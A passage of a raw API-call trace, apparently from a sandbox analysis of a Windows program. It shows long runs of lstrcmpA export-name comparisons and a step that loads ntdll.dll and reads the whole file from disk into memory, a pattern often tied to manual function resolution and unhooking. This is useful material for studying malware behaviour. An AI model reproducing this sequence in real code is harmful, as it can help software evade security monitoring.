lpString2="CLIPFORMAT_UserMarshal64") returned -1 [0178.014] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CLIPFORMAT_UserMarshalExt") returned -1 [0178.014] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CLIPFORMAT_UserSize") returned -1 [0178.014] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CLIPFORMAT_UserSize64") returned -1 [0178.014] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CLIPFORMAT_UserSizeExt") returned -1 [0178.014] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CLIPFORMAT_UserUnmarshal") returned -1 [0178.014] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CLIPFORMAT_UserUnmarshal64") returned -1 [0178.014] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CLIPFORMAT_UserUnmarshalExt") returned -1 [0178.014] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CLSIDFromOle1Class") returned -1 [0178.014] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CLSIDFromProgID") returned -1 [0178.014] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CLSIDFromProgIDEx") returned -1 [0178.014] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CLSIDFromString") returned -1 [0178.014] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CStdAsyncStubBuffer2_Connect") returned -1 [0178.014] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CStdAsyncStubBuffer2_Disconnect") returned -1 [0178.014] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CStdAsyncStubBuffer2_Release") returned -1 [0178.014] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CStdAsyncStubBuffer_AddRef") returned -1 [0178.014] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CStdAsyncStubBuffer_Connect") returned -1 [0178.014] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CStdAsyncStubBuffer_Disconnect") returned -1 [0178.014] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CStdAsyncStubBuffer_Invoke") returned -1 [0178.014] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CStdAsyncStubBuffer_QueryInterface") returned -1 [0178.015] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CStdAsyncStubBuffer_Release") returned -1 [0178.015] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CStdStubBuffer2_Connect") returned -1 [0178.015] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CStdStubBuffer2_CountRefs") returned -1 [0178.015] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CStdStubBuffer2_Disconnect") returned -1 [0178.015] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CStdStubBuffer2_QueryInterface") returned -1 [0178.015] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CheckInitDde") returned 1 [0178.015] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CleanROTForApartment") returned 1 [0178.015] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="ClipboardProcessUninitialize") returned 0 [0178.015] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="BindMoniker") returned 1 [0178.015] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CLIPFORMAT_UserFree") returned 1 [0178.015] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CLIPFORMAT_UserFree64") returned 1 [0178.015] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CLIPFORMAT_UserFreeExt") returned 1 [0178.015] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CLIPFORMAT_UserMarshal") returned 1 [0178.015] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CLIPFORMAT_UserMarshal64") returned 1 [0178.015] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CLIPFORMAT_UserMarshalExt") returned 1 [0178.015] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CLIPFORMAT_UserSize") returned 1 [0178.015] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CLIPFORMAT_UserSize64") returned 1 [0178.015] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CLIPFORMAT_UserSizeExt") returned 1 [0178.015] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CLIPFORMAT_UserUnmarshal") returned 1 [0178.015] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CLIPFORMAT_UserUnmarshal64") returned 1 [0178.015] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CLIPFORMAT_UserUnmarshalExt") returned 1 [0178.015] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CLSIDFromOle1Class") returned 1 [0178.015] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CLSIDFromProgID") returned 1 [0178.015] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CLSIDFromProgIDEx") returned 1 [0178.016] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CLSIDFromString") returned 1 [0178.016] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CStdAsyncStubBuffer2_Connect") returned -1 [0178.016] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CStdAsyncStubBuffer2_Disconnect") returned -1 [0178.016] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CStdAsyncStubBuffer2_Release") returned -1 [0178.016] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CStdAsyncStubBuffer_AddRef") returned -1 [0178.016] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CStdAsyncStubBuffer_Connect") returned -1 [0178.016] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CStdAsyncStubBuffer_Disconnect") returned -1 [0178.016] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CStdAsyncStubBuffer_Invoke") returned -1 [0178.016] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CStdAsyncStubBuffer_QueryInterface") returned -1 [0178.016] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CStdAsyncStubBuffer_Release") returned -1 [0178.016] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CStdStubBuffer2_Connect") returned -1 [0178.016] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CStdStubBuffer2_CountRefs") returned -1 [0178.016] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CStdStubBuffer2_Disconnect") returned -1 [0178.016] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CStdStubBuffer2_QueryInterface") returned -1 [0178.016] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CheckInitDde") returned 1 [0178.016] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CleanROTForApartment") returned 1 [0178.016] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="ClipboardProcessUninitialize") returned 1 [0178.016] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CoAddRefServerProcess") returned 1 [0178.016] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CoAicGetTokenForCOM") returned 0 [0178.016] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="BindMoniker") returned 1 [0178.016] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CLIPFORMAT_UserFree") returned 1 [0178.016] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CLIPFORMAT_UserFree64") returned 1 [0178.016] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CLIPFORMAT_UserFreeExt") returned 1 [0178.016] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CLIPFORMAT_UserMarshal") returned 1 [0178.016] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CLIPFORMAT_UserMarshal64") returned 1 [0178.016] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CLIPFORMAT_UserMarshalExt") returned 1 [0178.016] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CLIPFORMAT_UserSize") returned 1 [0178.016] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CLIPFORMAT_UserSize64") returned 1 [0178.017] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CLIPFORMAT_UserSizeExt") returned 1 [0178.017] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CLIPFORMAT_UserUnmarshal") returned 1 [0178.017] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CLIPFORMAT_UserUnmarshal64") returned 1 [0178.017] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CLIPFORMAT_UserUnmarshalExt") returned 1 [0178.017] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CLSIDFromOle1Class") returned 1 [0178.017] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CLSIDFromProgID") returned 1 [0178.017] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CLSIDFromProgIDEx") returned 1 [0178.017] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CLSIDFromString") returned 1 [0178.017] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CStdAsyncStubBuffer2_Connect") returned -1 [0178.017] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CStdAsyncStubBuffer2_Disconnect") returned -1 [0178.017] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CStdAsyncStubBuffer2_Release") returned -1 [0178.017] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CStdAsyncStubBuffer_AddRef") returned -1 [0178.017] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CStdAsyncStubBuffer_Connect") returned -1 [0178.017] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CStdAsyncStubBuffer_Disconnect") returned -1 [0178.017] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CStdAsyncStubBuffer_Invoke") returned -1 [0178.017] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CStdAsyncStubBuffer_QueryInterface") returned -1 [0178.017] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CStdAsyncStubBuffer_Release") returned -1 [0178.017] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CStdStubBuffer2_Connect") returned -1 [0178.017] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CStdStubBuffer2_CountRefs") returned -1 [0178.017] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CStdStubBuffer2_Disconnect") returned -1 [0178.017] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CStdStubBuffer2_QueryInterface") returned -1 [0178.017] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CheckInitDde") returned 1 [0178.018] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CleanROTForApartment") returned 1 [0178.018] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="ClipboardProcessUninitialize") returned 1 [0178.018] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CoAddRefServerProcess") returned 1 [0178.018] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CoAicGetTokenForCOM") returned 1 [0178.018] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CoAllowSetForegroundWindow") returned 0 [0178.018] lstrcmpA (lpString1="CoBuildVersion", lpString2="BindMoniker") returned 1 [0178.018] lstrcmpA (lpString1="CoBuildVersion", lpString2="CLIPFORMAT_UserFree") returned 1 [0178.018] lstrcmpA (lpString1="CoBuildVersion", lpString2="CLIPFORMAT_UserFree64") returned 1 [0178.018] lstrcmpA (lpString1="CoBuildVersion", lpString2="CLIPFORMAT_UserFreeExt") returned 1 [0178.018] lstrcmpA (lpString1="CoBuildVersion", lpString2="CLIPFORMAT_UserMarshal") returned 1 [0178.018] lstrcmpA (lpString1="CoBuildVersion", lpString2="CLIPFORMAT_UserMarshal64") returned 1 [0178.018] lstrcmpA (lpString1="CoBuildVersion", lpString2="CLIPFORMAT_UserMarshalExt") returned 1 [0178.018] lstrcmpA (lpString1="CoBuildVersion", lpString2="CLIPFORMAT_UserSize") returned 1 [0178.018] lstrcmpA (lpString1="CoBuildVersion", lpString2="CLIPFORMAT_UserSize64") returned 1 [0178.018] lstrcmpA (lpString1="CoBuildVersion", lpString2="CLIPFORMAT_UserSizeExt") returned 1 [0178.018] lstrcmpA (lpString1="CoBuildVersion", lpString2="CLIPFORMAT_UserUnmarshal") returned 1 [0178.018] lstrcmpA (lpString1="CoBuildVersion", lpString2="CLIPFORMAT_UserUnmarshal64") returned 1 [0178.018] lstrcmpA (lpString1="CoBuildVersion", lpString2="CLIPFORMAT_UserUnmarshalExt") returned 1 [0178.018] lstrcmpA (lpString1="CoBuildVersion", lpString2="CLSIDFromOle1Class") returned 1 [0178.018] lstrcmpA (lpString1="CoBuildVersion", lpString2="CLSIDFromProgID") returned 1 [0178.018] lstrcmpA (lpString1="CoBuildVersion", lpString2="CLSIDFromProgIDEx") returned 1 [0178.018] lstrcmpA (lpString1="CoBuildVersion", lpString2="CLSIDFromString") returned 1 [0178.018] lstrcmpA (lpString1="CoBuildVersion", lpString2="CStdAsyncStubBuffer2_Connect") returned -1 [0178.018] lstrcmpA (lpString1="CoBuildVersion", lpString2="CStdAsyncStubBuffer2_Disconnect") returned -1 [0178.018] lstrcmpA (lpString1="CoBuildVersion", lpString2="CStdAsyncStubBuffer2_Release") returned -1 [0178.019] lstrcmpA (lpString1="CoBuildVersion", lpString2="CStdAsyncStubBuffer_AddRef") returned -1 [0178.019] lstrcmpA (lpString1="CoBuildVersion", lpString2="CStdAsyncStubBuffer_Connect") returned -1 [0178.019] lstrcmpA (lpString1="CoBuildVersion", lpString2="CStdAsyncStubBuffer_Disconnect") returned -1 [0178.019] lstrcmpA (lpString1="CoBuildVersion", lpString2="CStdAsyncStubBuffer_Invoke") returned -1 [0178.019] lstrcmpA (lpString1="CoBuildVersion", lpString2="CStdAsyncStubBuffer_QueryInterface") returned -1 [0178.019] lstrcmpA (lpString1="CoBuildVersion", lpString2="CStdAsyncStubBuffer_Release") returned -1 [0178.019] lstrcmpA (lpString1="CoBuildVersion", lpString2="CStdStubBuffer2_Connect") returned -1 [0178.019] lstrcmpA (lpString1="CoBuildVersion", lpString2="CStdStubBuffer2_CountRefs") returned -1 [0178.019] lstrcmpA (lpString1="CoBuildVersion", lpString2="CStdStubBuffer2_Disconnect") returned -1 [0178.019] lstrcmpA (lpString1="CoBuildVersion", lpString2="CStdStubBuffer2_QueryInterface") returned -1 [0178.019] lstrcmpA (lpString1="CoBuildVersion", lpString2="CheckInitDde") returned 1 [0178.161] GetProcessHeap () returned 0x590000 [0178.161] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x40ce040 | out: hHeap=0x590000) returned 1 [0178.167] GetProcessHeap () returned 0x590000 [0178.167] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x10) returned 0x5a9320 [0178.167] LoadLibraryA (lpLibFileName="Ntdll.dll") returned 0x7ffc5f810000 [0178.167] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetModuleFileNameA") returned 0x7ffc5ecf6e30 [0178.167] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CreateFileA") returned 0x7ffc5ecfd8a0 [0178.167] GetModuleFileNameA (in: hModule=0x7ffc5f810000, lpFilename=0x14f5d0, nSize=0x104 | out: lpFilename="C:\\Windows\\SYSTEM32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll")) returned 0x1d [0178.168] CreateFileA (lpFileName="C:\\Windows\\SYSTEM32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x140 [0178.168] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetFileSizeEx") returned 0x7ffc5ecfdaa0 [0178.168] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CloseHandle") returned 0x7ffc5ecfd650 [0178.168] GetFileSizeEx (in: hFile=0x140, lpFileSize=0x14f5b0 | out: lpFileSize=0x14f5b0*=1817160) returned 1 [0178.168] GetProcessHeap () returned 0x590000 [0178.168] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x1bba48) returned 0x40c6040 [0178.173] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="ReadFile") returned 0x7ffc5ecfdbd0 [0178.173] ReadFile (in: hFile=0x140, lpBuffer=0x40c6040, nNumberOfBytesToRead=0x1bba48, lpNumberOfBytesRead=0x14f5a4, lpOverlapped=0x0 | out: lpBuffer=0x40c6040*, lpNumberOfBytesRead=0x14f5a4*=0x1bba48, lpOverlapped=0x0) returned 1 [0178.340] CloseHandle (hObject=0x140) returned 1 [0178.340] lstrcmpA (lpString1="A_SHAFinal", lpString2="A_SHAFinal") returned 0 [0178.340] lstrcmpA (lpString1="A_SHAInit", lpString2="A_SHAFinal") returned 1 [0178.340] lstrcmpA (lpString1="A_SHAInit", lpString2="A_SHAInit") returned 0 [0178.340] lstrcmpA (lpString1="A_SHAUpdate", lpString2="A_SHAFinal") returned 1 [0178.340] lstrcmpA (lpString1="A_SHAUpdate", lpString2="A_SHAInit") returned 1 [0178.340] lstrcmpA (lpString1="A_SHAUpdate", lpString2="A_SHAUpdate") returned 0 [0178.340] lstrcmpA (lpString1="AlpcAdjustCompletionListConcurrencyCount", lpString2="A_SHAFinal") returned 1 [0178.340] lstrcmpA (lpString1="AlpcAdjustCompletionListConcurrencyCount", lpString2="A_SHAInit") returned 1 [0178.340] lstrcmpA (lpString1="AlpcAdjustCompletionListConcurrencyCount", lpString2="A_SHAUpdate") returned 1 [0178.340] lstrcmpA (lpString1="AlpcAdjustCompletionListConcurrencyCount", lpString2="AlpcAdjustCompletionListConcurrencyCount") returned 0 [0178.341] lstrcmpA (lpString1="AlpcFreeCompletionListMessage", lpString2="A_SHAFinal") returned 1 [0178.341] lstrcmpA (lpString1="AlpcFreeCompletionListMessage", lpString2="A_SHAInit") returned 1 [0178.341] lstrcmpA (lpString1="AlpcFreeCompletionListMessage", lpString2="A_SHAUpdate") returned 1 [0178.341] lstrcmpA (lpString1="AlpcFreeCompletionListMessage", lpString2="AlpcAdjustCompletionListConcurrencyCount") returned 1 [0178.341] lstrcmpA (lpString1="AlpcFreeCompletionListMessage", lpString2="AlpcFreeCompletionListMessage") returned 0 [0178.341] lstrcmpA (lpString1="AlpcGetCompletionListLastMessageInformation", lpString2="A_SHAFinal") returned 1 [0178.341] lstrcmpA (lpString1="AlpcGetCompletionListLastMessageInformation", lpString2="A_SHAInit") returned 1 [0178.341] lstrcmpA (lpString1="AlpcGetCompletionListLastMessageInformation", lpString2="A_SHAUpdate") returned 1 [0178.341] lstrcmpA (lpString1="AlpcGetCompletionListLastMessageInformation", lpString2="AlpcAdjustCompletionListConcurrencyCount") returned 1 [0178.341] lstrcmpA (lpString1="AlpcGetCompletionListLastMessageInformation", lpString2="AlpcFreeCompletionListMessage") returned 1 [0178.341] lstrcmpA (lpString1="AlpcGetCompletionListLastMessageInformation", lpString2="AlpcGetCompletionListLastMessageInformation") returned 0 [0178.341] lstrcmpA (lpString1="AlpcGetCompletionListMessageAttributes", lpString2="A_SHAFinal") returned 1 [0178.341] lstrcmpA (lpString1="AlpcGetCompletionListMessageAttributes", lpString2="A_SHAInit") returned 1 [0178.341] lstrcmpA (lpString1="AlpcGetCompletionListMessageAttributes", lpString2="A_SHAUpdate") returned 1 [0178.341] lstrcmpA (lpString1="AlpcGetCompletionListMessageAttributes", lpString2="AlpcAdjustCompletionListConcurrencyCount") returned 1 [0178.341] lstrcmpA (lpString1="AlpcGetCompletionListMessageAttributes", lpString2="AlpcFreeCompletionListMessage") returned 1 [0178.341] lstrcmpA (lpString1="AlpcGetCompletionListMessageAttributes", lpString2="AlpcGetCompletionListLastMessageInformation") returned 1 [0178.341] lstrcmpA (lpString1="AlpcGetCompletionListMessageAttributes", lpString2="AlpcGetCompletionListMessageAttributes") returned 0 [0178.341] lstrcmpA (lpString1="AlpcGetHeaderSize", lpString2="A_SHAFinal") returned 1 [0178.341] lstrcmpA (lpString1="AlpcGetHeaderSize", lpString2="A_SHAInit") returned 1 [0178.341] lstrcmpA (lpString1="AlpcGetHeaderSize", lpString2="A_SHAUpdate") returned 1 [0178.341] lstrcmpA (lpString1="AlpcGetHeaderSize", lpString2="AlpcAdjustCompletionListConcurrencyCount") returned 1 [0178.341] lstrcmpA (lpString1="AlpcGetHeaderSize", lpString2="AlpcFreeCompletionListMessage") returned 1 [0178.342] lstrcmpA (lpString1="AlpcGetHeaderSize", lpString2="AlpcGetCompletionListLastMessageInformation") returned 1 [0178.342] lstrcmpA (lpString1="AlpcGetHeaderSize", lpString2="AlpcGetCompletionListMessageAttributes") returned 1 [0178.342] lstrcmpA (lpString1="AlpcGetHeaderSize", lpString2="AlpcGetHeaderSize") returned 0 [0178.342] lstrcmpA (lpString1="AlpcGetMessageAttribute", lpString2="A_SHAFinal") returned 1 [0178.342] lstrcmpA (lpString1="AlpcGetMessageAttribute", lpString2="A_SHAInit") returned 1 [0178.342] lstrcmpA (lpString1="AlpcGetMessageAttribute", lpString2="A_SHAUpdate") returned 1 [0178.342] lstrcmpA (lpString1="AlpcGetMessageAttribute", lpString2="AlpcAdjustCompletionListConcurrencyCount") returned 1 [0178.342] lstrcmpA (lpString1="AlpcGetMessageAttribute", lpString2="AlpcFreeCompletionListMessage") returned 1 [0178.342] lstrcmpA (lpString1="AlpcGetMessageAttribute", lpString2="AlpcGetCompletionListLastMessageInformation") returned 1 [0178.342] lstrcmpA (lpString1="AlpcGetMessageAttribute", lpString2="AlpcGetCompletionListMessageAttributes") returned 1 [0178.342] lstrcmpA (lpString1="AlpcGetMessageAttribute", lpString2="AlpcGetHeaderSize") returned 1 [0178.342] lstrcmpA (lpString1="AlpcGetMessageAttribute", lpString2="AlpcGetMessageAttribute") returned 0 [0178.342] lstrcmpA (lpString1="AlpcGetMessageFromCompletionList", lpString2="A_SHAFinal") returned 1 [0178.342] lstrcmpA (lpString1="AlpcGetMessageFromCompletionList", lpString2="A_SHAInit") returned 1 [0178.342] lstrcmpA (lpString1="AlpcGetMessageFromCompletionList", lpString2="A_SHAUpdate") returned 1 [0178.342] lstrcmpA (lpString1="AlpcGetMessageFromCompletionList", lpString2="AlpcAdjustCompletionListConcurrencyCount") returned 1 [0178.342] lstrcmpA (lpString1="AlpcGetMessageFromCompletionList", lpString2="AlpcFreeCompletionListMessage") returned 1 [0178.343] lstrcmpA (lpString1="AlpcGetMessageFromCompletionList", lpString2="AlpcGetCompletionListLastMessageInformation") returned 1 [0178.343] lstrcmpA (lpString1="AlpcGetMessageFromCompletionList", lpString2="AlpcGetCompletionListMessageAttributes") returned 1 [0178.343] lstrcmpA (lpString1="AlpcGetMessageFromCompletionList", lpString2="AlpcGetHeaderSize") returned 1 [0178.343] lstrcmpA (lpString1="AlpcGetMessageFromCompletionList", lpString2="AlpcGetMessageAttribute") returned 1 [0178.343] lstrcmpA (lpString1="AlpcGetMessageFromCompletionList", lpString2="AlpcGetMessageFromCompletionList") returned 0 [0178.343] lstrcmpA (lpString1="AlpcGetOutstandingCompletionListMessageCount", lpString2="A_SHAFinal") returned 1 [0178.343] lstrcmpA (lpString1="AlpcGetOutstandingCompletionListMessageCount", lpString2="A_SHAInit") returned 1 [0178.343] lstrcmpA (lpString1="AlpcGetOutstandingCompletionListMessageCount", lpString2="A_SHAUpdate") returned 1 [0178.343] lstrcmpA (lpString1="AlpcGetOutstandingCompletionListMessageCount", lpString2="AlpcAdjustCompletionListConcurrencyCount") returned 1 [0178.343] lstrcmpA (lpString1="AlpcGetOutstandingCompletionListMessageCount", lpString2="AlpcFreeCompletionListMessage") returned 1 [0178.343] lstrcmpA (lpString1="AlpcGetOutstandingCompletionListMessageCount", lpString2="AlpcGetCompletionListLastMessageInformation") returned 1 [0178.343] lstrcmpA (lpString1="AlpcGetOutstandingCompletionListMessageCount", lpString2="AlpcGetCompletionListMessageAttributes") returned 1 [0178.343] lstrcmpA (lpString1="AlpcGetOutstandingCompletionListMessageCount", lpString2="AlpcGetHeaderSize") returned 1 [0178.343] lstrcmpA (lpString1="AlpcGetOutstandingCompletionListMessageCount", lpString2="AlpcGetMessageAttribute") returned 1 [0178.343] lstrcmpA (lpString1="AlpcGetOutstandingCompletionListMessageCount", lpString2="AlpcGetMessageFromCompletionList") returned 1 [0178.343] lstrcmpA (lpString1="AlpcGetOutstandingCompletionListMessageCount", lpString2="AlpcGetOutstandingCompletionListMessageCount") returned 0 [0178.343] lstrcmpA (lpString1="AlpcInitializeMessageAttribute", lpString2="A_SHAFinal") returned 1 [0178.343] lstrcmpA (lpString1="AlpcInitializeMessageAttribute", lpString2="A_SHAInit") returned 1 [0178.343] lstrcmpA (lpString1="AlpcInitializeMessageAttribute", lpString2="A_SHAUpdate") returned 1 [0178.343] lstrcmpA (lpString1="AlpcInitializeMessageAttribute", lpString2="AlpcAdjustCompletionListConcurrencyCount") returned 1 [0178.343] lstrcmpA (lpString1="AlpcInitializeMessageAttribute", lpString2="AlpcFreeCompletionListMessage") returned 1 [0178.343] lstrcmpA (lpString1="AlpcInitializeMessageAttribute", lpString2="AlpcGetCompletionListLastMessageInformation") returned 1 [0178.343] lstrcmpA (lpString1="AlpcInitializeMessageAttribute", lpString2="AlpcGetCompletionListMessageAttributes") returned 1 [0178.343] lstrcmpA (lpString1="AlpcInitializeMessageAttribute", lpString2="AlpcGetHeaderSize") returned 1 [0178.469] lstrcmpA (lpString1="AlpcInitializeMessageAttribute", lpString2="AlpcGetMessageAttribute") returned 1 [0178.469] lstrcmpA (lpString1="AlpcInitializeMessageAttribute", lpString2="AlpcGetMessageFromCompletionList") returned 1 [0178.469] lstrcmpA (lpString1="AlpcInitializeMessageAttribute", lpString2="AlpcGetOutstandingCompletionListMessageCount") returned 1 [0178.469] lstrcmpA (lpString1="AlpcInitializeMessageAttribute", lpString2="AlpcInitializeMessageAttribute") returned 0 [0178.469] lstrcmpA (lpString1="AlpcMaxAllowedMessageLength", lpString2="A_SHAFinal") returned 1 [0178.469] lstrcmpA (lpString1="AlpcMaxAllowedMessageLength", lpString2="A_SHAInit") returned 1 [0178.469] lstrcmpA (lpString1="AlpcMaxAllowedMessageLength", lpString2="A_SHAUpdate") returned 1 [0178.469] lstrcmpA (lpString1="AlpcMaxAllowedMessageLength", lpString2="AlpcAdjustCompletionListConcurrencyCount") returned 1 [0178.469] lstrcmpA (lpString1="AlpcMaxAllowedMessageLength", lpString2="AlpcFreeCompletionListMessage") returned 1 [0178.469] lstrcmpA (lpString1="AlpcMaxAllowedMessageLength", lpString2="AlpcGetCompletionListLastMessageInformation") returned 1 [0178.469] lstrcmpA (lpString1="AlpcMaxAllowedMessageLength", lpString2="AlpcGetCompletionListMessageAttributes") returned 1 [0178.469] lstrcmpA (lpString1="AlpcMaxAllowedMessageLength", lpString2="AlpcGetHeaderSize") returned 1 [0178.469] lstrcmpA (lpString1="AlpcMaxAllowedMessageLength", lpString2="AlpcGetMessageAttribute") returned 1 [0178.469] lstrcmpA (lpString1="AlpcMaxAllowedMessageLength", lpString2="AlpcGetMessageFromCompletionList") returned 1 [0178.469] lstrcmpA (lpString1="AlpcMaxAllowedMessageLength", lpString2="AlpcGetOutstandingCompletionListMessageCount") returned 1 [0178.469] lstrcmpA (lpString1="AlpcMaxAllowedMessageLength", lpString2="AlpcInitializeMessageAttribute") returned 1 [0178.469] lstrcmpA (lpString1="AlpcMaxAllowedMessageLength", lpString2="AlpcMaxAllowedMessageLength") returned 0 [0178.469] lstrcmpA (lpString1="AlpcRegisterCompletionList", lpString2="A_SHAFinal") returned 1 [0178.469] lstrcmpA (lpString1="AlpcRegisterCompletionList", lpString2="A_SHAInit") returned 1 [0178.469] lstrcmpA (lpString1="AlpcRegisterCompletionList", lpString2="A_SHAUpdate") returned 1 [0178.469] lstrcmpA (lpString1="AlpcRegisterCompletionList", lpString2="AlpcAdjustCompletionListConcurrencyCount") returned 1 [0178.470] lstrcmpA (lpString1="AlpcRegisterCompletionList", lpString2="AlpcFreeCompletionListMessage") returned 1 [0178.470] lstrcmpA (lpString1="AlpcRegisterCompletionList", lpString2="AlpcGetCompletionListLastMessageInformation") returned 1 [0178.470] lstrcmpA (lpString1="AlpcRegisterCompletionList", lpString2="AlpcGetCompletionListMessageAttributes") returned 1 [0178.470] lstrcmpA (lpString1="AlpcRegisterCompletionList", lpString2="AlpcGetHeaderSize") returned 1 [0178.470] lstrcmpA (lpString1="AlpcRegisterCompletionList", lpString2="AlpcGetMessageAttribute") returned 1 [0178.470] lstrcmpA (lpString1="AlpcRegisterCompletionList", lpString2="AlpcGetMessageFromCompletionList") returned 1 [0178.470] lstrcmpA (lpString1="AlpcRegisterCompletionList", lpString2="AlpcGetOutstandingCompletionListMessageCount") returned 1 [0178.470] lstrcmpA (lpString1="AlpcRegisterCompletionList", lpString2="AlpcInitializeMessageAttribute") returned 1 [0178.470] lstrcmpA (lpString1="AlpcRegisterCompletionList", lpString2="AlpcMaxAllowedMessageLength") returned 1 [0178.470] lstrcmpA (lpString1="AlpcRegisterCompletionList", lpString2="AlpcRegisterCompletionList") returned 0 